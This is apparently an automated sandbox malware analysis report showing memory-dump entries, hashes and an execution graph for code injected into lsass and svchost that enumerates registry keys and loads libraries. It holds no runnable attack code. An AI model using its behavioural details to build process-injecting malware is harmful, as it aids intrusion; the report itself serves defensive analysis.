                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2933794660-0
                                                                                                                            • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                                                            • Instruction ID: fe0a85a94f7736e8f1811965c89875d15abe2672651892889c268e27fb3d6e1c
                                                                                                                            • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                                                            • Instruction Fuzzy Hash: 1111F166714F058AEF00CF60F85D3A833A4F7597A8F441D26DA6E46B95DB7CC5948380
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileType
                                                                                                                            • String ID: \\.\pipe\
                                                                                                                            • API String ID: 3081899298-91387939
                                                                                                                            • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                                                            • Instruction ID: 2f4b7ab9b6b4d2fd4753ba052fc98d32996a35375249b626469eb73938ecf5d4
                                                                                                                            • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                                                            • Instruction Fuzzy Hash: E971C2A6200F894AE6659F26B94D3AAA7A4F3857D4F44801BDD0F47F89DF38CE458700
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331385456.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f14e0000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CallTranslator
                                                                                                                            • String ID: MOC$RCC
                                                                                                                            • API String ID: 3163161869-2084237596
                                                                                                                            • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                            • Instruction ID: d070504b4f6ab16698584910d28eb8b80bc01e4cc0e3f10349b5f2c037af8c0d
                                                                                                                            • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                            • Instruction Fuzzy Hash: 6E616B73600F848AEB20DF65E4583AD7BA0F784BD8F144216EF4A57B99DB38DA95C700
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileType
                                                                                                                            • String ID: \\.\pipe\
                                                                                                                            • API String ID: 3081899298-91387939
                                                                                                                            • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                                                            • Instruction ID: 394cc914bfb9ce43346b5ff93633d9b94699b0b3b218dfcc43da45d9579c068f
                                                                                                                            • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                                                            • Instruction Fuzzy Hash: 1951F5B2204B8189E6769F2AB09C3AA6BA1F3857C0F65412BDD4F27F49DA7DCD04C740
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileType
                                                                                                                            • String ID: \\.\pipe\
                                                                                                                            • API String ID: 3081899298-91387939
                                                                                                                            • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                                                            • Instruction ID: 6e761f3a21dc2246a1aef658ceb1943d5242180b715b5e1401853d8f59a56f5e
                                                                                                                            • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                                                            • Instruction Fuzzy Hash: 8A51D4B2218B8989E6749F2AB45D3AA6762F3857C0F44812BDD5F07F59EA3DCD048740
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                            • String ID: U
                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                            • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                                                            • Instruction ID: 824dda5bf0e141a0eccdff39b2f392aa61083a03da449fe0be0865378a6b09d5
                                                                                                                            • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                                                            • Instruction Fuzzy Hash: 75419FB3314B808ADB208F25F84C3A9A7A1F7987D4F444126EE4E87B94EB7CC841CB40
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                            • String ID: U
                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                            • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                                                            • Instruction ID: c53e148514c93bad0f2e7d8b5fe3954aa2b74c2c1402395441e27d63ee265e01
                                                                                                                            • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                                                            • Instruction Fuzzy Hash: BF4184B2729B408ADB209F25F44D39967A0F7987D4F504026EE4E87B94EB3CC841CB40
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                            • String ID: csm
                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                            • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                                                            • Instruction ID: 0179ef454bca868754a89d0f14593ff5d1bafe773b9c0e76b87cdcda21dd5abb
                                                                                                                            • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                                                            • Instruction Fuzzy Hash: C6113A76214F8086EB618F15F458359B7E5FB88B98F594222EE8E17B68DF3CC951CB00
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                            • String ID: csm
                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                            • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                                                            • Instruction ID: fc393b24a3cf5e93f96326cbc1deecc5d0ba1190469aa8f37d231bdb885e5442
                                                                                                                            • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                                                            • Instruction Fuzzy Hash: B4112E72214F4486EB618B25F45835977E5FB88BA4F588222DF8D07B58DF3CC951C700
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331385456.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f14e0000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __std_exception_copy
                                                                                                                            • String ID: ierarchy Descriptor'$riptor at (
                                                                                                                            • API String ID: 592178966-758928094
                                                                                                                            • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                                                            • Instruction ID: 42604dadee08075db72dd804d857af22540e6553bd8cf7546b60624dadb498d8
                                                                                                                            • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                                                            • Instruction Fuzzy Hash: 2DE08661640F4594DF058F22F84829873A0DB99BA4F499123996D0B315FA3CD6F9C700
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331385456.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f14e0000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __std_exception_copy
                                                                                                                            • String ID: Locator'$riptor at (
                                                                                                                            • API String ID: 592178966-4215709766
                                                                                                                            • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                                                            • Instruction ID: d05b7e5c656130d9458ccdc22e0b75791a29142332b64578b38792f26bb6b93c
                                                                                                                            • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                                                            • Instruction Fuzzy Hash: 41E08661640F4484DF058F21F8441987360E799B94B889123C96D0B355EA3CD5E5C700
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 756756679-0
                                                                                                                            • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                                                            • Instruction ID: fd815924ccaf22e34c037317531bc049dc234f77afa6770aba1465aea0f85cca
                                                                                                                            • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                                                            • Instruction Fuzzy Hash: F5118C66601F8489EE05DF66F84C22973A1FB89FC4F18406ADE4E57B66DE3CD842C300
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 756756679-0
                                                                                                                            • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                                                            • Instruction ID: 82ec88930908ede03a152f782d96b2ac71a5e30259151145052ab1b77e435860
                                                                                                                            • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                                                            • Instruction Fuzzy Hash: 92118265611F488AEF04DB66F44D22973A5F789FD0F588026DE4E57B66DE3CC842C300
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1617791916-0
                                                                                                                            • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                            • Instruction ID: 5530d73242211928b6024003faf75465f242705db9492874eec173ea436ce9dc
                                                                                                                            • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                            • Instruction Fuzzy Hash: 48E092B6601A848AEB048F62E80C34A36E1FB8DF86F14C024CD0E07751DF7D98D9CB50
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1617791916-0
                                                                                                                            • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                            • Instruction ID: b278347ed22e7151f603d1e85ffea4ffbaa701bac3e443c82d47137fe5257616
                                                                                                                            • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                            • Instruction Fuzzy Hash: 66E092B5621A048BEB048F62E80C34A36E1FB8DFA6F04C024C90E0B752EF7D88D9C750

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:0.7%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:74
                                                                                                                            Total number of Limit Nodes:2
                                                                                                                            execution_graph 15131 14e41fd1abc 15136 14e41fd1628 GetProcessHeap 15131->15136 15133 14e41fd1acb 15134 14e41fd1ad2 Sleep SleepEx 15133->15134 15135 14e41fd1598 StrCmpIW StrCmpW 15133->15135 15134->15133 15135->15133 15137 14e41fd1648 _invalid_parameter_noinfo 15136->15137 15181 14e41fd1268 GetProcessHeap 15137->15181 15139 14e41fd1650 15140 14e41fd1268 2 API calls 15139->15140 15141 14e41fd1661 15140->15141 15142 14e41fd1268 2 API calls 15141->15142 15143 14e41fd166a 15142->15143 15144 14e41fd1268 2 API calls 15143->15144 15145 14e41fd1673 15144->15145 15146 14e41fd168e RegOpenKeyExW 15145->15146 15147 14e41fd18a6 15146->15147 15148 14e41fd16c0 RegOpenKeyExW 15146->15148 15147->15133 15149 14e41fd16e9 15148->15149 15150 14e41fd16ff RegOpenKeyExW 15148->15150 15185 14e41fd12bc RegQueryInfoKeyW 15149->15185 15152 14e41fd173a RegOpenKeyExW 15150->15152 15153 14e41fd1723 15150->15153 15155 14e41fd1775 RegOpenKeyExW 15152->15155 15156 14e41fd175e 15152->15156 15196 14e41fd104c RegQueryInfoKeyW 15153->15196 15160 14e41fd1799 15155->15160 15161 14e41fd17b0 RegOpenKeyExW 15155->15161 15159 14e41fd12bc 13 API calls 15156->15159 15162 14e41fd176b RegCloseKey 15159->15162 15163 14e41fd12bc 13 API calls 15160->15163 15164 14e41fd17eb RegOpenKeyExW 15161->15164 15165 14e41fd17d4 15161->15165 15162->15155 15166 14e41fd17a6 RegCloseKey 15163->15166 15168 14e41fd1826 RegOpenKeyExW 15164->15168 15169 14e41fd180f 15164->15169 15167 14e41fd12bc 13 API calls 15165->15167 15166->15161 15173 14e41fd17e1 RegCloseKey 15167->15173 15171 14e41fd184a 15168->15171 15172 14e41fd1861 RegOpenKeyExW 15168->15172 15170 14e41fd104c 5 API calls 15169->15170 15174 14e41fd181c RegCloseKey 15170->15174 15175 14e41fd104c 5 API calls 15171->15175 15176 14e41fd189c RegCloseKey 15172->15176 15177 14e41fd1885 15172->15177 15173->15164 15174->15168 15178 14e41fd1857 RegCloseKey 15175->15178 15176->15147 15179 14e41fd104c 5 API calls 15177->15179 15178->15172 15180 14e41fd1892 RegCloseKey 15179->15180 15180->15176 15202 14e41fe6168 15181->15202 15183 14e41fd1283 GetProcessHeap 15184 14e41fd12ae _invalid_parameter_noinfo 15183->15184 15184->15139 15186 14e41fd148a RegCloseKey 15185->15186 15187 14e41fd1327 GetProcessHeap 15185->15187 15186->15150 15193 14e41fd133e _invalid_parameter_noinfo 15187->15193 15188 14e41fd1476 GetProcessHeap HeapFree 15188->15186 15189 14e41fd1352 RegEnumValueW 15189->15193 15191 14e41fd13d3 GetProcessHeap 15191->15193 15192 14e41fd141e lstrlenW GetProcessHeap 15192->15193 15193->15188 15193->15189 15193->15191 15193->15192 15194 14e41fd13f3 GetProcessHeap HeapFree 15193->15194 15195 14e41fd1443 StrCpyW 15193->15195 15204 14e41fd152c 15193->15204 15194->15192 15195->15193 15197 14e41fd11b5 RegCloseKey 15196->15197 15200 14e41fd10bf _invalid_parameter_noinfo 15196->15200 15197->15152 15198 14e41fd10cf RegEnumValueW 15198->15200 15199 14e41fd114e GetProcessHeap 15199->15200 15200->15197 15200->15198 15200->15199 15201 14e41fd116e GetProcessHeap HeapFree 15200->15201 15201->15200 15203 14e41fe6177 15202->15203 15205 14e41fd157c 15204->15205 15206 14e41fd1546 15204->15206 15205->15193 15206->15205 15207 14e41fd155d StrCmpIW 15206->15207 15208 14e41fd1565 StrCmpW 15206->15208 15207->15206 15208->15206 15209 14e41fa273c 15210 14e41fa276a 15209->15210 15211 14e41fa2858 LoadLibraryA 15210->15211 15212 14e41fa28d4 15210->15212 15211->15210

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1683269324-0
                                                                                                                            • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                                                            • Instruction ID: 701d4b212a0684b59ab9b099f346debbb554c1cfb4979cb8b986742d3a5a455b
                                                                                                                            • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                                                            • Instruction Fuzzy Hash: CB1139B271864182FF60AB61BB1D3F9A3E4BF54344F5841259A0BC16B5EF7CC1468230

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0000014E41FD1628: GetProcessHeap.KERNEL32 ref: 0000014E41FD1633
                                                                                                                              • Part of subcall function 0000014E41FD1628: HeapAlloc.KERNEL32 ref: 0000014E41FD1642
                                                                                                                              • Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD16B2
                                                                                                                              • Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD16DF
                                                                                                                              • Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD16F9
                                                                                                                              • Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD1719
                                                                                                                              • Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD1734
                                                                                                                              • Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD1754
                                                                                                                              • Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD176F
                                                                                                                              • Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD178F
                                                                                                                              • Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD17AA
                                                                                                                              • Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD17CA
                                                                                                                            • Sleep.KERNEL32 ref: 0000014E41FD1AD7
                                                                                                                            • SleepEx.KERNELBASE ref: 0000014E41FD1ADD
                                                                                                                              • Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD17E5
                                                                                                                              • Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD1805
                                                                                                                              • Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD1820
                                                                                                                              • Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD1840
                                                                                                                              • Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD185B
                                                                                                                              • Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD187B
                                                                                                                              • Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD1896
                                                                                                                              • Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD18A0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1534210851-0
                                                                                                                            • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                                                            • Instruction ID: 27739bd1d7c2b649979a3e3ac9a2f5b2f111066e3f9e7ba65cc6bd2b1fdd864d
                                                                                                                            • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                                                            • Instruction Fuzzy Hash: 1231B771308A4182EF509B66DA593F9A3E4BF84BD0F0C55229E0BC76B6EF24C8538330

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 57 14e41fd3844-14e41fd384f 58 14e41fd3869-14e41fd3870 57->58 59 14e41fd3851-14e41fd3864 StrCmpNIW 57->59 59->58 60 14e41fd3866 59->60 60->58
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: dialer
                                                                                                                            • API String ID: 0-3528709123
                                                                                                                            • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                                                                            • Instruction ID: edc9b53c890d6efa8cfb08019f2e5464623e49ddff2869f1cd1f5de1b6805b2a
                                                                                                                            • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                                                                            • Instruction Fuzzy Hash: 8BD05EB13117058AFF14DFAA88CD6B0A390BF04754F8C40208A0181660DB18C99E9620

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324776404.0000014E41FA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fa0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1029625771-0
                                                                                                                            • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                            • Instruction ID: 67325ab9c1bf59a10d455d8bffd91d13401eaaa9fb1b126a29269b2ed4ac34ab
                                                                                                                            • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                            • Instruction Fuzzy Hash: CA61DD32B0169087DF54CF9590487ADB3E2FB58BE4F1C8121EE5A87B98DA38D853D720

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 367 14e41fd2b2c-14e41fd2ba5 call 14e41ff2ce0 370 14e41fd2bab-14e41fd2bb1 367->370 371 14e41fd2ee0-14e41fd2f03 367->371 370->371 372 14e41fd2bb7-14e41fd2bba 370->372 372->371 373 14e41fd2bc0-14e41fd2bc3 372->373 373->371 374 14e41fd2bc9-14e41fd2bd9 GetModuleHandleA 373->374 375 14e41fd2bdb-14e41fd2beb call 14e41fe6090 374->375 376 14e41fd2bed 374->376 378 14e41fd2bf0-14e41fd2c0e 375->378 376->378 378->371 381 14e41fd2c14-14e41fd2c33 StrCmpNIW 378->381 381->371 382 14e41fd2c39-14e41fd2c3d 381->382 382->371 383 14e41fd2c43-14e41fd2c4d 382->383 383->371 384 14e41fd2c53-14e41fd2c5a 383->384 384->371 385 14e41fd2c60-14e41fd2c73 384->385 386 14e41fd2c83 385->386 387 14e41fd2c75-14e41fd2c81 385->387 388 14e41fd2c86-14e41fd2c8a 386->388 387->388 389 14e41fd2c9a 388->389 390 14e41fd2c8c-14e41fd2c98 388->390 391 14e41fd2c9d-14e41fd2ca7 389->391 390->391 392 14e41fd2d9d-14e41fd2da1 391->392 393 14e41fd2cad-14e41fd2cb0 391->393 396 14e41fd2da7-14e41fd2daa 392->396 397 14e41fd2ed2-14e41fd2eda 392->397 394 14e41fd2cc2-14e41fd2ccc 393->394 395 14e41fd2cb2-14e41fd2cbf call 14e41fd199c 393->395 399 14e41fd2cce-14e41fd2cdb 394->399 400 14e41fd2d00-14e41fd2d0a 394->400 395->394 401 14e41fd2dbb-14e41fd2dc5 396->401 402 14e41fd2dac-14e41fd2db8 call 14e41fd199c 396->402 397->371 397->385 399->400 407 14e41fd2cdd-14e41fd2cea 399->407 408 14e41fd2d3a-14e41fd2d3d 400->408 409 14e41fd2d0c-14e41fd2d19 400->409 404 14e41fd2dc7-14e41fd2dd4 401->404 405 14e41fd2df5-14e41fd2df8 401->405 402->401 404->405 413 14e41fd2dd6-14e41fd2de3 404->413 414 14e41fd2dfa-14e41fd2e03 call 14e41fd1bbc 405->414 415 14e41fd2e05-14e41fd2e12 lstrlenW 405->415 416 14e41fd2ced-14e41fd2cf3 407->416 411 14e41fd2d4b-14e41fd2d58 lstrlenW 408->411 412 14e41fd2d3f-14e41fd2d49 call 14e41fd1bbc 408->412 409->408 417 14e41fd2d1b-14e41fd2d28 409->417 419 14e41fd2d7b-14e41fd2d8d call 14e41fd3844 411->419 420 14e41fd2d5a-14e41fd2d64 411->420 412->411 424 14e41fd2d93-14e41fd2d98 412->424 421 14e41fd2de6-14e41fd2dec 413->421 414->415 431 14e41fd2e4a-14e41fd2e55 414->431 425 14e41fd2e35-14e41fd2e3f call 14e41fd3844 415->425 426 14e41fd2e14-14e41fd2e1e 415->426 423 14e41fd2cf9-14e41fd2cfe 416->423 416->424 427 14e41fd2d2b-14e41fd2d31 417->427 419->424 435 14e41fd2e42-14e41fd2e44 419->435 420->419 430 14e41fd2d66-14e41fd2d79 call 14e41fd152c 420->430 421->431 432 14e41fd2dee-14e41fd2df3 421->432 423->400 423->416 424->435 425->435 426->425 436 14e41fd2e20-14e41fd2e33 call 14e41fd152c 426->436 427->424 437 14e41fd2d33-14e41fd2d38 427->437 430->419 430->424 439 